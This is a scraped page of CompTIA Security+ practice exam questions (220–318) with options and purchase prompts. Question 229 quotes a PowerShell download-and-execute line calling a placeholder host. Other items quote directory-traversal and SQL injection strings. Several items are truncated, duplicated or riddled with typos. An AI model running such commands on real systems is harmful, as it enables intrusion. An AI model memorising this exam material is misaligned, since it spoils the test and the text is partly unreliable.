Cloud security engineers are planning to allow and deny access to specific features in order to in-crease data security. Which of the following cloud features is the most appropriate to ensure ac-cess is granted properly?

Options:

A.

API integrations

B.

Auditing

C.

Resource policies

D.

Virtual networks

Buy Now
Questions 221

While troubleshooting a service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity requirements. Which of the following would be the BEST solution to securely prevent future issues?

Options:

A.

Using an administrator account to run the processes and disabling the account when it is not in use

B.

Implementing a shared account the team can use to run automated processes

C.

Configuring a service account to run the processes

D.

Removing the password complexity requirements for the user account

Buy Now
Questions 222

A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server

is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets

were never patched. Which of the following should be done to prevent an attack like this from happening again? (Select three).

Options:

A.

Install DLP software to prevent data loss.

B.

Use the latest version of software.

C.

Install a SIEM device.

D.

Implement MDM.

E.

Implement a screened subnet for the web server.

F.

Install an endpoint security solution.

G.

Update the website certificate and revoke the existing ones.

Buy Now
Questions 223

A company recently upgraded its authentication infrastructure and now has more computing power. Which of the following should the company consider using to ensure user credentials are

being transmitted and stored more securely?

Options:

A.

Blockchain

B.

Salting

C.

Quantum

D.

Digital signature

Buy Now
Questions 224

Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclosed?

Options:

A.

A full inventory of all hardware and software

B.

Documentation of system classifications

C.

A list of system owners and their departments

D.

Third-party risk assessment documentation

Buy Now
Questions 225

Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

Options:

A.

Lessons learned

B.

Identification

C.

Simulation

D.

Containment

Buy Now
Questions 226

A government organization is developing an advanced Al defense system. Develop-ers are using information collected from third-party providers Analysts are no-ticing inconsistencies in the expected powers Of then learning and attribute the Outcome to a recent attack on one of the suppliers. Which of the following IS the most likely reason for the inaccuracy of the system?

Options:

A.

Improper algorithms security

B.

Tainted training data

C.

virus

D.

Cryptomalware

Buy Now
Questions 227

A security manager is attempting to meet multiple security objectives in the next fiscal year. The security manager has proposed the purchase of the following four items:

Vendor A:

1- Firewall

1-12 switch

Vendor B:

1- Firewall

1-12 switch

Which of the following security objectives is the security manager attempting to meet? (Select two).

Options:

A.

Simplified patch management

B.

Scalability

C.

Zero-day attack tolerance

D.

Multipath

E.

Replication

F.

Redundancy

Buy Now
Questions 228

Two organizations are discussing a possible merger Both Organizations Chief Fi-nancial Officers would like to safely share payroll data with each Other to de-termine if the pay scales for different roles are similar at both organizations Which Of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

Options:

A.

Pseudo-anonymization

B.

Tokenization

C.

Data masking

D.

Encryption

Buy Now
Questions 229

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Buy Now
Questions 230

Stakeholders at an organisation must be kept aware of any incidents and receive updates on status changes as they occur Which of the following Plans would fulfill this requirement?

Options:

A.

Communication plan

B.

Disaster recovery plan

C.

Business continuity plan

D.

Risk plan

Buy Now
Questions 231

Which of the following should be addressed first on security devices before connecting to the network?

Options:

A.

Open permissions

B.

Default settings

C.

API integration configuration

D.

Weak encryption

Buy Now
Questions 232

Which of the following threat actors is most likely to be motivated by ideology?

Options:

A.

Business competitor

B.

Hacktivist

C.

Criminal syndicate

D.

Script kiddie

E.

Disgruntled employee

Buy Now
Questions 233

A systems analyst is responsible for generating a new digital forensics chain -of- custody form Which of the following should the analyst include in this documentation? (Select two).

Options:

A.

The order of volatility

B.

A forensics NDA

C.

The provenance of the artifacts

D.

The vendor's name

E.

The date and time

F.

A warning banner

Buy Now
Questions 234

An organization is repairing damage after an incident. Which Of the following controls is being implemented?

Options:

A.

Detective

B.

Preventive

C.

Corrective

D.

Compensating

Buy Now
Questions 235

Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)

• Hostname: ws01

• Domain: comptia.org

• IPv4: 10.1.9.50

• IPV4: 10.2.10.50

• Root: home.aspx

• DNS CNAME:homesite.

Instructions:

Drag the various data points to the correct locations within the CSR. Extension criteria belong in the let hand column and values belong in the corresponding row in the right hand column.

Options:

Buy Now
Questions 236

Which of the following types of controls is a turnstile?

Options:

A.

Physical

B.

Detective

C.

Corrective

D.

Technical

Buy Now
Questions 237

Security engineers are working on digital certificate management with the top priority of making administration easier. Which of the following certificates is the best option?

Options:

A.

User

B.

Wildcard

C.

Self-signed

D.

Root

Buy Now
Questions 238

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

Options:

A.

Testing input validation on the user input fields

B.

Performing code signing on company-developed software

C.

Performing static code analysis on the software

D.

Ensuring secure cookies are used

Buy Now
Questions 239

Which Of the following control types is patch management classified under?

Options:

A.

Deterrent

B.

Physical

C.

Corrective

D.

Detective

Buy Now
Questions 240

A security team is conducting a security review of a hosted data provider. The management team has asked the hosted data provider to share proof that customer data is being appropriately protected.

Which of the following would provide the best proof that customer data is being protected?

Options:

A.

SOC2

B.

CSA

C.

CSF

D.

1SO 31000

Buy Now
Questions 241

A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

Options:

A.

Soft token

B.

Smart card

C.

CSR

D.

SSH key

Buy Now
Questions 242

A security administrator Is managing administrative access to sensitive systems with the following requirements:

• Common login accounts must not be used (or administrative duties.

• Administrative accounts must be temporal in nature.

• Each administrative account must be assigned to one specific user.

• Accounts must have complex passwords.

• Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?

Options:

A.

ABAC

B.

SAML

C.

PAM

D.

CASB

Buy Now
Questions 243

A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Select two).

Options:

A.

Chain of custody

B.

Tags

C.

Reports

D.

Time stamps

E.

Hash values

F.

Time offset

Buy Now
Questions 244

A security analyst is taking part in an evaluation process that analyzes and categorizes threat actors Of real-world events in order to improve the incident response team's process. Which Of the following is the analyst most likely participating in?

Options:

A.

MITRE ATT&CK

B.

Walk-through

C.

Red team

D.

Purple team-I

E.

TAXI

Buy Now
Questions 245

A penetration tester was able to compromise a host using previously captured network traffic. Which of the following is the result of this action?

Options:

A.

Integer overflow

B.

Race condition

C.

Memory leak

D.

Replay attack

Buy Now
Questions 246

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?

Options:

A.

OWASP

B.

Obfuscation/camouflage

C.

Test environment

D.

Prevent of information exposure

Buy Now
Questions 247

A network administrator has been alerted that web pages are experiencing long load times After determining it is not a routing or DNS issue the administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago

1 sec ave: 99 percent busy

5 sec ave: 97 percent busy

1 min ave: 83 percent busy

Which of the following is The router experiencing?

Options:

A.

DDoS attack

B.

Memory leak

C.

Buffer overflow

D.

Resource exhaustion

Buy Now
Questions 248

A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following best describes this type of attack?

Options:

A.

Reconnaissance

B.

Impersonation

C.

Typosquatting

D.

Watering-hole

Buy Now
Questions 249

A cybersecurity analyst needs to adopt controls to properly track and log user actions to an individual. Which of the following should the analyst implement?

Options:

A.

Non-repudiation

B.

Baseline configurations

C.

MFA

D.

DLP

Buy Now
Questions 250

A security administrator needs to provide secure access to internal networks for external partners The administrator has given the PSK and other parameters to the third-party security administrator. Which of the following is being used to establish this connection?

Options:

A.

Kerberos

B.

SSL/TLS

C.

IPSec

D.

SSH

Buy Now
Questions 251

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Buy Now
Questions 252

A security analyst reviews web server logs and finds the following string

gallerys?file—. ./../../../../. . / . ./etc/passwd

Which of the following attacks was performed against the web server?

Options:

A.

Directory traversal

B.

CSRF

C.

Pass the hash

D.

SQL injection

Buy Now
Questions 253

An organization decided not to put controls in place because of the high cost of implementing the controls compared to the cost of a potential fine. Which of the following risk management strategies is the organization following?

Options:

A.

Transference

B.

Avoidance

C.

Mitigation

D.

Acceptance

Buy Now
Questions 254

While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method?

Options:

A.

Data loss prevention

B.

Blocking IP traffic at the firewall

C.

Containerization

D.

File integrity monitoring

Buy Now
Questions 255

Which ol the following is required in order (or an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Buy Now
Questions 256

The new Chief Information Security Officer at a company has asked the security learn to implement stronger user account policies. The new policies require:

• Users to choose a password unique to their last ten passwords

• Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Select two).

Options:

A.

Password complexity

B.

Password history

C.

Geolocation

D.

Geospatial

E.

Geotagging

F.

Password reuse

Buy Now
Questions 257

A company recently completed the transition from data centers to the cloud. Which of the following solutions will best enable the company to detect security threats in applications that run in isolated environments within the cloud environment?

Options:

A.

Security groups

B.

Container security

C.

Virtual networks

D.

Segmentation

Buy Now
Questions 258

A security investigation revealed mat malicious software was installed on a server using a server administrator credentials. During the investigation the server administrator explained that Telnet was regularly used to log in. Which of the blowing most likely occurred?

Options:

A.

A spraying attack was used to determine which credentials to use

B.

A packet capture tool was used to steal the password

C.

A remote-access Trojan was used to install the malware

D.

A directory attack was used to log in as the server administrator

Buy Now
Questions 259

Which of the following describes software on network hardware that needs to be updated on a rou-tine basis to help address possible vulnerabilities?

Options:

A.

Vendor management

B.

Application programming interface

C.

Vanishing

D.

Encryption strength

E.

Firmware

Buy Now
Questions 260

Which of the following is the correct order of evidence from most to least volatile in forensic analysis?

Options:

A.

Memory, disk, temporary filesystems, CPU cache

B.

CPU cache, memory, disk, temporary filesystems

C.

CPU cache, memory, temporary filesystems, disk

D.

CPU cache, temporary filesystems, memory, disk

Buy Now
Questions 261

Which of the following can be used to detect a hacker who is stealing company data over port 80?

Options:

A.

Web application scan

B.

Threat intelligence

C.

Log aggregation

D.

Packet capture

Buy Now
Questions 262

Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?

Options:

A.

EF x asset value

B.

ALE / SLE

C.

MTBF x impact

D.

SLE x ARO

Buy Now
Questions 263

Which of the following would be best to ensure data is saved to a location on a server, is easily scaled, and is centrally monitored?

Options:

A.

 Edge computing

B.

Microservices

C.

Containers

D.

Thin client

Buy Now
Questions 264

The application development team is in the final stages of developing a new healthcare application. The team has requested copies of current PHI records to perform the final testing.

Which of the following would be the best way to safeguard this information without impeding the testing process?

Options:

A.

Implementing a content filter

B.

Anonymizing the data

C.

Deploying DLP tools

D.

Installing a FIM on the application server

Buy Now
Questions 265

A security analyst reviews web server logs and notices the following line:

104.35. 45.53 -

[22/May/2020:07 : 00:58 +0100] "GET . UNION ALL SELECT

user login, user _ pass, user email from wp users—— HTTP/I.I" 200 1072 http://www.example.com/wordpress/wp—admin/

Which of the following vulnerabilities is the attacker trying to exploit?

Options:

A.

SSRF

B.

CSRF

C.

xss

D.

SQLi

Buy Now
Questions 266

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would most likely contain language that would prohibit this activity?

Options:

A.

NDA

B.

BPA

C.

AUP

D.

SLA

Buy Now
Questions 267

A large bank with two geographically dispersed data centers Is concerned about major power disruptions at Both locations. Every day each location experiences very brief outages thai last (or a few seconds. However, during the summer a high risk of intentional under-voltage events that could last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

Options:

A.

Dual supply

B.

Generator

C.

PDU

D.

Dally backups

Buy Now
Questions 268

A financial institution recently joined a bug bounty program to identify security issues in the institution's new public platform. Which of the following best describes who the institution is working with to identify security issues?

Options:

A.

Script kiddie

B.

Insider threats

C.

Malicious actor

D.

Authorized hacker

Buy Now
Questions 269

A cybersecurity analyst at Company A is working to establish a secure communication channel with a counter part at Company B, which is 3,000 miles (4.828 kilometers) away. Which of the following concepts would help the analyst meet this goal m a secure manner?

Options:

A.

Digital signatures

B.

Key exchange

C.

Salting

D.

PPTP

Buy Now
Questions 270

A company is moving its retail website to a public cloud provider. The company wants to tokenize audit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

Options:

A.

WAF

B.

CASB

C.

VPN

D.

TLS

Buy Now
Questions 271

A security analyst needs to recommend a solution that will allow current Active Directory accounts and groups to be used for access controls on both network and remote-access devices. Which of the

following should the analyst recommend? (Select two).

Options:

A.

TACACS+

B.

RADIUS

C.

OAuth

D.

OpenlD

E.

Kerberos

F.

CHAP

Buy Now
Questions 272

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which

of the following roles is the company assuming?

Options:

A.

Data owner

B.

Data processor

C.

Data steward

D.

Data collector

Buy Now
Questions 273

A security analyst is reviewing computer logs because a host was compromised by malware After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

Options:

A.

Dump file

B.

System log

C.

Web application log

D.

Security too

Buy Now
Questions 274

A security engineer is investigating a penetration test report that states the company website is vulnerable to a web application attack. While checking the web logs from the time of the test, the engineer notices several invalid web form submissions using an unusual address: "SELECT * FROM customername”. Which of the following is most likely being attempted?

Options:

A.

Directory traversal

B.

SQL injection

C.

Privilege escalation

D.

Cross-site scripting

Buy Now
Questions 275

A network administrator needs to determine Ihe sequence of a server farm's logs. Which of the following should the administrator consider? (Select TWO).

Options:

A.

Chain of custody

B.

Tags

C.

Reports

D.

Time stamps

E.

Hash values

F.

Time offset

Buy Now
Questions 276

A security administrator is using UDP port 514 to send a syslog through an unsecure network to the SIEM server. Which of the following is the best way for the administrator to improve the process?

Options:

A.

Change the protocol to TCP.

B.

Add LDAP authentication to the SIEM server.

C.

Use a VPN from the internal server to the SIEM and enable DLP.

D.

Add SSL/TLS encryption and use a TCP 6514 port to send logs.

Buy Now
Questions 277

A security administrator Installed a new web server. The administrator did this to Increase the capacity (or an application due to resource exhaustion on another server. Which o( the following algorithms should the administrator use to split the number of the connections on each server In half?

Options:

A.

Weighted response

B.

Round-robin

C.

Least connection

D.

Weighted least connection

Buy Now
Questions 278

Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team. Which of the following would be MOST appropriate for the IT security team to analyze?

Options:

A.

Access control

B.

Syslog

C.

Session Initiation Protocol traffic logs

D.

Application logs

Buy Now
Questions 279

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Buy Now
Questions 280

Which of the following is a security implication of newer 1CS devices that are becoming more common in corporations?

Options:

A.

Devices with celular communication capabilities bypass traditional network security controls

B.

Many devices do not support elliptic-curve encryption algorithms due to the overhead they require.

C.

These devices often lade privacy controls and do not meet newer compliance regulations

D.

Unauthorized voice and audio recording can cause loss of intellectual property

Buy Now
Questions 281

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled. Which of the following can be

used to accomplish this task?

Options:

A.

Application allow list

B.

Load balancer

C.

Host-based firewall

D.

VPN

Buy Now
Questions 282

A security team is providing input on the design of a secondary data center that has the following requirements:+ Anatural disaster at the primary site should not affect the secondary site. The secondary site should have the capability for failover during traffic surge situations.+ The secondary site must meet the same physical security requirements as the primary site. The secondary site must provide protection against power surges and outages.

Which of the following should the security team recommend? (Select two).

Options:

A.

 Coniguring replication of the web servers at the primary site to offline storage

B.

 Constructing the secondary site in a geographically disperse location

C.

 Deploying load balancers at the primary site

D.

 Installing generators

E.

 Using differential backups at the secondary site

F.

 Implementing hot and cold aisles at the secondary site

Buy Now
Questions 283

A company wants to enable BYOD for checking email and reviewing documents. Many of the documents contain sensitive organizational information. Which of the following should be deployed first before allowing the use of personal devices to access company data?

Options:

A.

MDM

B.

RFID

C.

DLR

D.

SIEM

Buy Now
Questions 284

A security operations technician is searching the log named /vax/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

Options:

A.

cat /var/messages | grep 10.1.1.1

B.

grep 10.1.1.1 | cat /var/messages

C.

grep /var/messages | cat 10.1.1.1

D.

cat 10.1.1.1 | grep /var/messages

Buy Now
Questions 285

Which of the following threat actors is the most likely to use common hacking tools found on the internet to attempt to remotely compromise an organization's web server?

Options:

A.

Organized crime

B.

Insider threat

C.

Unskilled attacker

D.

Nation-state

Buy Now
Questions 286

A systems administrator wants to add a second factor to the single sign-on portal that the organization uses. Currently, only a username and password are required. Which of the following should the administrator implement to best meet this requirement?

Options:

A.

Personal verification questions

B.

Software-based TOTP

C.

Log-in image checks

D.

Secondary PIN code

Buy Now
Questions 287

In a tabletop exercise a simulated group of disgruntled employees deleted all of their work from the file server on their last day at the company. Which of the following actions would a security engineer take to mitigate this risk?

Options:

A.

Perform nightly snapshots.

B.

Deploy RAID 10 on the file server.

C.

Maintain the last known-good configurations.

D.

Replicate the data to a hot site.

Buy Now
Questions 288

Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).

Options:

A.

The device has been moved from a production environment to a test environment.

B.

The device is configured to use cleartext passwords.

C.

The device is moved to an isolated segment on the enterprise network.

D.

The device is moved to a different location in the enterprise.

E.

The device’s encryption level cannot meet organizational standards.

F.

The device is unable to receive authorized updates.

Buy Now
Questions 289

A company needs to keep the fewest records possible meet compliance needs, and ensure destruction of records that are no longer needed Which of the following best describes the policy that meets these requirements?

Options:

A.

Security policy

B.

Classification policy

C.

Retention policy

D.

Access control policy

Buy Now
Questions 290

An analyst is providing feedback on an incident that involved an unauthorized zone transfer and an on-path attack in a corporate network. The analyst's recommendation is to implement secure DNS. Which of the following would be the most beneficial result of this action?

Options:

A.

Ensuring that data has not been modified in transit

B.

Providing redundancy in the event of a server failure

C.

Preventing unauthenticated clients access to the server

D.

Allowing for IPv6-enabled hosts to leverage the server

Buy Now
Questions 291

A systems administrator is looking for a low-cost application-hosting solution that is cloud-based. Which of the following meets these requirements?

Options:

A.

Serverless framework

B.

Type 1 hypervisor

C.

SD-WAN

D.

SDN

Buy Now
Questions 292

A network administrator deployed a DNS logging tool that logs suspicious websites that are visited and then sends a daily report based on various weighted metrics. Which of the following best describes the type of control the administrator put in place?

Options:

A.

Preventive

B.

Deterrent

C.

Corrective

D.

Detective

Buy Now
Questions 293

A security administrator is reviewing reports about suspicious network activity occurring on a subnet Users on the network report that connectivity to various websites is intermittent. The administrator logs in to a workstation and reviews the following command output:

Which of the following best describes what is occurring on the network?

Options:

A.

ARP poisoning

B.

On-path attack

C.

URL redirection

D.

IP address conflicts

Buy Now
Questions 294

Which of the following best describes a social engineering attack that uses a targeted electronic messaging campaign aimed at a Chief Executive Officer?

Options:

A.

Whaling

B.

Spear phishing

C.

Impersonation

D.

Identity fraud

Buy Now
Questions 295

A security engineer needs to configure an NGFW to minimize the impact of the increasing number of various traffic types during attacks. Which of the following types of rules is the engineer the most likely to configure?

Options:

A.

Signature-based

B.

Behavioral-based

C.

URL-based

D.

Agent-based

Buy Now
Questions 296

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee's corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation. Which of the following logs should the analyst use as a data source?

Options:

A.

Application

B.

IPS/IDS

C.

Network

D.

Endpoint

Buy Now
Questions 297

Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two).

Options:

A.

Fencing

B.

Video surveillance

C.

Badge access

D.

Access control vestibule

E.

Sign-in sheet

F.

Sensor

Buy Now
Questions 298

recovery sites is the best option?

Options:

A.

Hot

B.

Cold

C.

Warm

D.

Geographically dispersed

Buy Now
Questions 299

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?

Options:

A.

ACL

B.

DLP

C.

IDS

D.

IPS

Buy Now
Questions 300

Which of the following threat actors is most likely to use a high level of sophistication and potentially zero-day exploits to target organizations and systems?

Options:

A.

APT groups

B.

Script kiddies

C.

Hacktivists

D.

Ethical hackers

Buy Now
Questions 301

In a rush to meet an end-of-year business goal, the IT department was told to implement a new business application. The security engineer reviews the attributes of the application and decides the time needed to perform due diligence is insufficient from a cybersecurity perspective. Which of the following BEST describes the security engineer's response?

Options:

A.

Risk tolerance

B.

Risk acceptance

C.

Risk importance

D.

Risk appetite

Buy Now
Questions 302

A security team received the following requirements for a new BYOD program that will allow employees to use personal smartphones to access business email:

• Sensitive customer data must be safeguarded

• Documents from managed sources should not be opened in unmanaged destinations.

• Sharing of managed documents must be disabled

• Employees should not be able to download emailed images to their devices

• Personal photos and contact lists must be kept private

• IT must be able to remove data from lost/stolen devices or when an employee no longer works for the company

Which of the following are the best features to enable to meet these requirements? (Select two).

Options:

A.

Remote wipe

B.

VPN connection

C.

Biometric authentication

D.

Device location tracking

E.

Geofencing

F.

Application approve list

G.

Containerization

Buy Now
Questions 303

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device. Which of the following best describes the user’s activity?

Options:

A.

Penetration testing

B.

Phishing campaign

C.

External audit

D.

Insider threat

Buy Now
Questions 304

Which of the following secure coding practices involves keeping business logic within a database?

Options:

A.

Stored procedures

B.

Normalization

C.

Obfuscation

D.

Tokenization

Buy Now
Questions 305

A food delivery service gives its drivers mobile devices that enable customers to track orders. Some drivers forget to leave the devices at the store when their shifts end. Which of the following would help remind the drivers to leave the devices at the store?

Options:

A.

Geofencing alerts

B.

Containerization

C.

Bring your own device policy

D.

Remote device wipe

Buy Now
Questions 306

Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?

Options:

A.

Automation

B.

Compliance checklist

C.

Attestation

D.

Manual audit

Buy Now
Questions 307

A security analyst is reviewing the following logs:

[10:00:00 AM] Login rejected - username administrator - password Spring2023

[10:00:01 AM] Login rejected - username jsmith - password Spring2023

[10:00:01 AM] Login rejected - username guest - password Spring2023

[10:00:02 AM] Login rejected - username cpolk - password Spring2023

[10:00:03 AM] Login rejected - username fmarbin - password Spring2023

Which of the following attacks is most likely occurring?

Options:

A.

Password spraying

B.

Account forgery

C.

Pass-the-hash

D.

Brute-force

Buy Now
Questions 308

Which of the following would best enable a systems administrator to easily determine which devices are located at a remote facility and allow policy to be pushed to only those devices?

Options:

A.

Baseline configurations

B.

Network diagrams

C.

Standard naming conventions

D.

Hot sites

Buy Now
Questions 309

An application server is published directly on the internet with a public IP address Which of the following should the administrator use to monitor the application traffic?

Options:

A.

WAF

B.

Content filter

C.

NAT

D.

Perimeter network

Buy Now
Questions 310

A third-party vendor is moving a particular application to the end-of-life stage at the end of the current year. Which of the following is the most critical risk if the company chooses to continue running the application?

Options:

A.

Lack of security updates

B.

Lack of new features

C.

Lack of support

D.

Lack of source code access

Buy Now
Questions 311

Which of the following must be considered when designing a high-availability network? (Select two).

Options:

A.

Ease of recovery

B.

Ability to patch

C.

Physical isolation

D.

Responsiveness

E.

Attack surface

F.

Extensible authentication

Buy Now
Questions 312

After conducting a vulnerability scan a systems administrator notices that one of the identified vulnerabilities is not present on the systems that were scanned. Which of the following describes this example?

Options:

A.

False positive

B False negative

B.

True positive

C.

True negative

Buy Now
Questions 313

During a forensic investigation, an analyst uses software to create a checksum of the affected subject's email file. Which of the following is the analyst practicing?

Options:

A.

Chain of custody

B.

Data recovery

C.

Non-repudiation

D.

Integrity

Buy Now
Questions 314

Which of the following alert types is the most likely to be ignored over time?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Buy Now
Questions 315

Which of the following describes the maximum allowance of accepted risk?

Options:

A.

Risk indicator

B.

Risk level

C.

Risk score

D.

Risk threshold

Buy Now
Questions 316

An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five years. A few weeks after the employee resigned, one of the batch jobs failed and caused a major disruption. Which of the following would work best to prevent this type of incident from reoccurring?

Options:

A.

Job rotation

B.

Retention

C.

Outsourcing

D.

Separation of duties

Buy Now
Questions 317

Which of the following technologies can better utilize compute and memory resources for on-premises application workloads?

Options:

A.

Containers

B.

Microservices

C.

Serverless architecture

D.

Community clouds

Buy Now
Questions 318

A security team is conducting a review of the company's SaaS and PaaS security postures. Which of the following is the best source of secure architecture guidance for these environments?

Options:

A.

ISO

B.

CSA

C.

PCI DSS

D.

SOC 2

Buy Now
Exam Code: SY0-601
Exam Name: CompTIA Security+ Exam 2023
Last Update: Nov 2, 2024
Questions: 1063
SY0-601 pdf

SY0-601 PDF

$24  $80
SY0-601 Engine

SY0-601 Testing Engine

$28.5  $95
SY0-601 PDF + Engine

SY0-601 PDF + Testing Engine

$39  $130